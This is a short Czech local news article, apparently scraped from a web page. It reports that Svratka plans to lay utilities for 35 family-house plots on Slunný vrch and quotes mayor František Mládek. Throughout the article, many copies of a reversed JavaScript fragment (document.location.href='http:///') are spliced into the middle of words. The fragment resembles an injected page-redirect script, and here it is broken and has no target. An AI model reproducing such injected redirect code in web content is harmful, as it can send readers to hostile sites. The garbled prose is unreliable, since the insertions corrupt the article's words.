Rainbow page separator

V létě vybaví parcely na Slunném vrchu inženýrskými sítěmi

Sobota, 28. února 2015

Svratka / Mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to zvané Slunný vrch by mělo le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos v letních měsících ožít stavebních ruchem. „Zatím [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to budou pouze stavební stroje, podle plánu bychom měli zahájit zemní práce a odstar[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovat tak zasíťování tamních pozemků,“ informoval svratecký starosta František Mládek.
V lokalitě Tábor na místě nazvaném Slunný vrch plánuje radnice připravit pětatřicet pozemků pro výstavbu rodinných domků. Inženýrské sítě by měly být ho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovy v průběhu le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošního roku, aby nejpozději v roce 2016 mohli noví majitelé stavebních parcel zahájit výstavbu domů.
„V nabídce je k prodeji ještě třináct stavebních parcel. Stavět by sem mělo i vedle Šťastného domova u Řivnáče. I tam jsou ještě dvě stavební parcely volné,“ konsta[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toval starosta Svratky.